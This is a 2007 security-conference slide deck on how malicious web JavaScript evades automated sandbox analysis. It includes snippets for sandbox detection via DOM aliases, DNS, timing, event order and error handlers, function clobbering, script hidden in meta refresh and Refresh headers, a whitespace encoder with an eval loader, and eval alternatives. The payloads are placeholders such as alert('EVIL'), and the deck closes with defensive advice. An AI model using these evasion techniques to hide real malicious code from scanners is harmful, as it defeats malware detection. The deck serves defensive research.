Circumventing Automated JavaScript Analysis Billy Hoffman ([email protected]) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Overview
• JavaScript is part of the attacker's toolkit
  − All the “vanilla” stuff over
  − Packing traditional malware
• IBM ISS: “In second half 2007 Web attack obfuscation approached 100%”*
• Exploit frameworks amplify the problem
  − Rapid adoption of new techniques
• We need tools to analyze this
• How are we doing and can we win?
* From: IBM Internet Security Systems X-Force® 2008 Mid-Year Trend Statistics

Obfuscation Design Pattern
• Malicious code is stored
  − String literals
  − Numeric literals
• Decode function unpacks literals into new code
• Ratio of literals to total code is huge!
  − Normal code: 2%-7%
  − Obfuscated code: > 30%

Obfuscation Example

Obfuscation != Malicious
• Legitimate reasons for obfuscating
  − “Protect” client-side code
  − Reducing download size
• Common packers
  − JSMin
  − Dean Edwards packer
  − Yahoo’s
• Result: It's tough to know what to analyze

Original Approach to JS Analysis
• The Lazy Method
  − Replace dangerous calls with alert()
  − Run in a browser
• The Tom Liston Method
  − Wrap writes in <TEXTAREA>s
  − Run in a browser
• The Perl-Fu Method
  − Port malware to Perl
• The Monkey Wrench Method
  − Run it in SpiderMonkey

Tricks to Defeating Analysis
• Deliberate sandbox breaks
  − </TEXTAREA>
• Integrity checks
  − arguments.callee.toString()
    • arguments.callee.toString().replace(/\W/g,"").toUpperCase();
  − Gives source code of function body
• Length checks
• Use function body as key

VBScript Wrapper
• Still in use!
  − Older DHTML web apps
  − Plug-in enumeration (IE8)
  − Malware
• No open source VBScript parsers
• No public standard grammar
• Not very wide-spread
[Diagram labels: JavaScript, VBScript, JavaScript]

Preventing Sample Collection
• Can’t reverse what you don’t have!
• Track IPs
  − Geolocation
  − Blacklist security firms
• Serve once per IP
• User-agent sniffing
• document.referrer tricks

For those playing at home
Approach: Difficulties
• All Approaches: Sampling prevention
• The Lazy Method: Integrity checks; running hostile code in browser
• The Tom Liston Method: Integrity checks; </TEXTAREA> escapes; running hostile code in browser
• Perl Fu: Way too time consuming; translating JavaScript constructs
• The Monkey Wrench Approach: Does pretty well

Approach Today
• Combination of automatic and manual
• Interpreters and debuggers (aka sandboxes)
  − Rhino
  − NJS
  − DecryptJS
  − SpiderMonkey
• Trap/monitor certain events
  − DOM calls
  − eval()s, etc.

It's More Complex Than That
• JS interpreter/debugger is less than ½ the battle
• JavaScript != DOM
  − Host objects
  − Events/Timers
  − HTTP requests
  − Error handling
• DOM >= HTML
  − HTTP headers/cookies
  − Browser environment
  − Plug-ins

Fundamental Issue
Current JavaScript sandboxes fail to fully/properly emulate the browser environment. These discrepancies are detectable by the JavaScript running inside the sandbox.

[Figure: Fundamental Issue, two images joined by !=]

Detecting JavaScript Sandboxes
• 4 big areas
  − DOM Testing
  − Network Testing
  − Execution Environment Testing
  − Plug-in Testing
• Use test results
  − Decrypt next layer
  − Handshake to serve next layer

DOM Testing
• Using the DOM values
• Detecting presence/lack of
• Gets and sets on values
• Interacting with HTML elements

DOM Testing: Basic
• Sandbox-specific functions
  − gc()
  − clone()
  − trap()
  − untrap()
  − readline()
• Malware forces SpiderMonkey to die
  − try {quit();} catch (e) { }; //more code here

Detecting Sandbox Specific Functions
    if (typeof(gc) == "function") {… } else {…}

Function Clobbering
• JavaScript is highly dynamic
• Can redefine functions at runtime!
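
The runtime redefinition named on the Function Clobbering slide can be sketched roughly as below. This is only an illustration under assumptions: `makeSandboxGlobals`, its `events` log, and the objects `a` and `b` are hypothetical stand-ins for a shell's global object (a real shell exposes `print()` and `quit()` as native globals), and the two reassignments simply mirror the slide titles rather than any specific sample.

```javascript
// Hypothetical model of a sandbox shell's globals. The events array only
// records which function actually ran, so the effect can be inspected.
function makeSandboxGlobals() {
  const events = [];
  return {
    events,
    print(msg) { events.push("print: " + msg); },
    quit() { events.push("quit"); }
  };
}

// Clobber 1: alias print to quit. A later print() call now ends the
// session instead of showing the decoded payload.
const a = makeSandboxGlobals();
a.print = a.quit;
a.print("decoded payload");

// Clobber 2: replace quit with a no-op. A later quit() call is swallowed
// and execution simply continues.
const b = makeSandboxGlobals();
b.quit = function () {};
b.quit();
b.print("still running");
```

Because both reassignments are ordinary property writes, nothing in the language prevents them; a tool that relies on its own helper functions staying intact would presumably need to keep private references to the originals.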

Redefining print() as quit()

Redefining quit() to Nothing

Intertwined DOM Properties
• Various aliases in the DOM
  − document.location == window.location == document.URL
  − window == window.window == window.self == window.parent
    • == window.self.self.self.self...
  − Any global variable attaches to window
    • var spi = 5; window.spi == spi; //true
• Set a value on one alias
• Read on another alias
• Different values mean sandbox

document.retarded
• Mosaic Netscape 0.9beta (1994)
• Set using HTTP headers
  − Set-Cookie:
  − Cookie:
• Get/Set using JavaScript
  − document.cookie
• Set using HTML
  − <META> tag

Meta Tag
• Supply meta data about HTML document
• http-equiv attribute
  − Allows document to specify HTTP headers
  − Content overriding an application protocol

HTTP-EQUIV to the rescue
• Setting cookies with HTML
    <html>
    <meta HTTP-EQUIV="Set-Cookie" CONTENT="cook2=Value 2">
    <meta HTTP-EQUIV="Set-Cookie" CONTENT="cook1=Value 1">
    <script>
    alert(document.cookie);
    </script>
    </html>

Setting Cookies with HTML

Hello Proprietary Extension!
• Setting cookies with HTML
    <html>
    <meta HTTP-EQUIV="Set-Cookie" CONTENT="cook2=Value 2; HttpOnly">
    <meta HTTP-EQUIV="Set-Cookie" CONTENT="cook1=Value 1">
    <script>
    alert(document.cookie);
    </script>
    </html>

Setting Cookies with HTML

More Meta Tag Fun
• Hide script in non-scriptable attribute
    <html>
    <title>Safe</title>
    <meta http-equiv="refresh" content="0;url=javascript:alert('EVIL')">
    <h1>All safe. Trust me!</h1>
    </html>

HTTP Refresh Header
• Completely remove JS from response body!
    HTTP/1.1 200 OK
    Refresh: 0;url=javascript:alert('EVIL!')
    Connection: close
    Content-Length: 29

    <h1>I'm Clean... really.</h1>

Psst! (IE8 supports the data: URI... data:text/html and data:text/javascript are awesome!)
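
From the analysis side, the Refresh examples above suggest that a tool should treat refresh targets as potential script carriers. A minimal sketch of such a check follows; the function names `refreshUrl` and `refreshCarriesScript` are hypothetical, and the parsing is deliberately simplified (it assumes a `seconds;url=...` shape and does not try to mirror every browser's lenient parsing).

```javascript
// Extracts the URL part of a Refresh value such as "0;url=http://example.com/".
// Returns null when the value carries no URL part.
function refreshUrl(value) {
  const m = /^\s*\d+\s*[;,]\s*(?:url\s*=\s*)?(.*)$/i.exec(value);
  if (!m) return null;
  // Drop one optional surrounding quote on each end.
  return m[1].trim().replace(/^['"]|['"]$/g, "");
}

// True when the refresh target uses a scheme that can carry script,
// here limited to the two schemes the slides mention.
function refreshCarriesScript(value) {
  const url = refreshUrl(value);
  return url !== null && /^(javascript|data):/i.test(url);
}
```

The same function could be applied both to a `Refresh:` response header and to the `content` attribute of a `<meta http-equiv="refresh">` tag, since the slides show the same value format in both places.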

Network Testing
• Sandboxes use dummy network objects
  − Good “Are you a browser?” test
• Use information about response
  − DNS successful?
  − Last Modified?
  − Image Dimensions?
  − Valid Response?
• Forces sandbox to send network traffic
  − Web bugs for hackers?

Network Testing – DNS Lookups
    <script>
    var count = 0;
    function loaded(name) { if (name != "bad") count++; }
    window.onload = function evil() {
      if (count == 1) alert("Browser!");
      else alert("Sandbox!");
    }
    </script>
    <iframe src="http://doesnotexist1" onload="loaded(this.name);" name="bad"></iframe>
    <iframe src="http://doesnotexist2" onload="loaded(this.name);" name="bad"></iframe>
    <iframe src="http://exists/foo.html" onload="loaded(this.name);" name="good"></iframe>

Network Testing - Images
• Image object provides rich meta data
  − Length
  − Width
  − Image was valid?
• CSS Images too
• Use this information
  − Complex handshaking
  − Construct a key
    var img = new Image();
    img.onload = goodFunc;
    img.onerror = badFunc;
    img.src = "http://evil.com/";

Side Note: Image Side Channels
• JavaScript Image object
• Height + width = 8 bytes
• How to send 0xFFFFFFFF without 4GB of pixel data?
  − GIF, PNG, Windows too short
  − BMP + RLE?
    Nope
• XBM Image Format
    #define w 1351
    #define h 1689
    static char b[]={0};

FF XBM WTF??!!!1111oneoneoneomg

The Dan Kaminsky Option

Network Testing - Ajax
• Ajax can see HTTP response headers
  − Complex handshaking
  − Construct a key
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4 && xhr.status == 200) {
        if (xhr.getResponseHeader("Secr3t") == "key") {
          //do evil
        }
      }
    }

Execution Environment Testing
• Sandboxes execute code differently
  − Trap function calls
  − Step/break on code
  − Manipulate data
• Can tell these differences
  − Timing information
  − Event Order
  − Error Handling

Timing Information
• Use JavaScript’s Date object
  − Millisecond resolution times
• Can detect paused execution
    <script>
    var start = (new Date()).getTime();
    document.writeln(String.fromCharCode(66,77,72));
    </script>
    <script>
    var diff = (new Date()).getTime() - start;
    if (diff < 3) document.writeln("Browser");
    else document.writeln("Sandbox");
    </script>

Detecting Steps/Breaks with Timers
• Timers are a pain!
  − Can’t really wait 5 seconds
  − Ordering
  − Clearing
• Can detect paused execution
• Start a timer
  − Perform some math operation
• After fixed interval
  − Sample the value
[Diagram: timer ticks, Count++ Count++ … Count++]

Detecting Steps/Breaks with Timers
    var count = 0;
    setInterval("count++;", 10);
    setTimeout(checkSum, 1000);
    function checkSum() {
      //a 10 ms interval ticks at most about 100 times in 1000 ms; allow for skew
      if (count >= 90 && count <= 100) {
        alert("Browser");
      } else {
        alert("Sandbox");
      }
    }

Event Order
Sandboxes don’t run events in the proper order
• XMLHttpRequest’s onreadystatechange() fires 4 times
• onclick() >> onclick() >> ondblclick()
• onkeydown() >> onkeypress() >> onkeyup()
• onmousedown() >> onmouseup() >> onclick()
• onmouseover() >> onmousemove()
• onclick() >> onfocus() (for inputs)
• onfocus() >> onblur()
• onload() >> onunload()

Advanced Event Order
• Dependents’ onload before window.onload
  − iFrames
  − Images
• Event propagation
  − DOM events must bubble
  − Continue based on return value of event
• Events that never fire
  − Invisible with CSS
[Diagram: onclick handlers on nested elements WINDOW, BODY, DIV, DIV, INPUT]

Error Handling
• window.onerror handles uncaught exceptions
• Induce syntax errors
• Recover in handler
    <script>
    window.onerror = function() {
      //evil code
    }
    </script>
    <script>
    Lolz &nd B00m$; //Syntax Error
    </script>

Error Handling
• window.onerror handles uncaught exceptions
• Induce runtime errors
• Harder to handle/debug
    window.onerror = function() {
      //evil code
    }
    function boom() {
      return 'so long!' & boom();
    }
    boom(); // error: too much recursion

Advanced Error Handling
• Detailed info passed to window.onerror
  − Message
  − File
  − Line Number
• Can be used to
  − Fingerprint web browser
  − Verify domain/location
  − Construct a decryption key

Plug-in Testing
• Not just navigator.plugins checks
• Timing is a cool test
  − Did I really invoke that ActiveX object?
• Sizing is a cool test
  − Is that Applet really 400 x 300?
• Cross Communication
  − Really sexy!
  − Apply previous methods inside plug-in
    • Error handling, Eventing, etc.

JavaScript -> Flash -> JavaScript
• Multiple ways
  − getURL();
  − Flash LSO
• Additional capabilities
  − Richer HTTP requests
  − More file formats
• Excellent browser support
[Diagram labels: JavaScript, Flash, JavaScript]

JavaScript -> Java -> JavaScript
• Lots of fun object casting
  − JSObject -> double -> JSObject
• Java has more capabilities than JS
  − High resolution timers
  − Sockets
  − Internal IP
• Assault the researcher!
  − Signed Applets can access the file system!
• LiveConnect
  − var myAddress = java.net.InetAddress.getLocalHost();
[Diagram labels: JavaScript, Java, JavaScript]

Preventing Sample Gathering
• Browser Identification for Web Applications (Shreeraj Shah 2004)
• HTTP headers
  − Ordering and Values
  − Redirects, form posts, content types, cookie settings
• HTTP Caching
  − Obeying the directives
    • HTTP/1.1 HTTP/1.0 Precedence
  − Sending conditional GETs

Crazy Idea #1
• Obfuscated code is obviously interesting
  − But not always malicious
• “Safe” looking code might not be interesting
• Can I create code that doesn’t look malicious?

Dehydrating a String
• Converts any string into whitespace
• 7 bits per character
  − 1 = space
  − 0 = tab
• \n means we are done
• 'a' = 1100001
• Dehydrate('a') = space, space, tab, tab, tab, tab, space

Dehydrate Function
    function dehydrate(s) {
      var r = new Array();
      for (var i = 0; i < s.length; i++) {
        // emit the 7 bits of each character, most significant bit first
        for (var j = 6; j >= 0; j--) {
          if (s.charCodeAt(i) & (Math.pow(2, j))) {
            r.push(' ');
          } else {
            r.push('\t');
          }
        }
      }
      r.push('\n');
      return r.join('');
    }

Hydrate Function
    function hydrate(s) {
      var r = new Array();
      var curr = 0;
      while (s.charAt(curr) != '\n') {
        var tmp = 0;
        // rebuild one character from 7 whitespace "bits"
        for (var i = 6; i >= 0; i--) {
          if (s.charAt(curr) == ' ') {
            tmp = tmp | (Math.pow(2, i));
          }
          curr++;
        }
        r.push(String.fromCharCode(tmp));
      }
      return r.join('');
    }

Invisible Malicious Code!
    //st4rt
    //3nd
    var html = document.body.innerHTML;
    var start = html.indexOf("//st" + "4rt");
    var end = html.indexOf("3" + "nd");
    var code = html.substring(start+12, end);
    eval(hydrate(code));

Crazy Idea #2
• Who cares how it's encoded?
• Eventually they have to execute the string of code
• CaffeineMonkey et al. are just hooking eval()
• Can I execute malicious code stored in a string without eval()?

Eval() The Interpreter has a Posse…
    var evilCode = "alert('evil');";
    window.location.replace("javascript:" + evilCode);
    document.location.replace("javascript:" + evilCode);
    setTimeout(evilCode, 10);
    setInterval(evilCode, 500);
    new Function(evilCode)();
    //IE only
    window.execScript(evilCode);

Fixing All of This
• Advice for tool developers
  − Remove discrepancies between sandbox and browser
    • DOM/HTTP/DNS/Network/Eventing
  − Everything should be interesting
  − The sandbox needs a sandbox; you will be attacked.
• Advice for others
  − Microsoft
    • Publish a grammar for VBScript
    • Disable completely based on DOCTYPE
  − Adobe: Release a controllable Flash VM

Shoulders of Giants
• Jose Nazario
• Ben Feinstein
• Internet Storm Center guys
• Stephan Chenette, et al. @ WebSense
• Shreeraj Shah
• Rob Freeman
• Aviv Raff

Questions?
[email protected]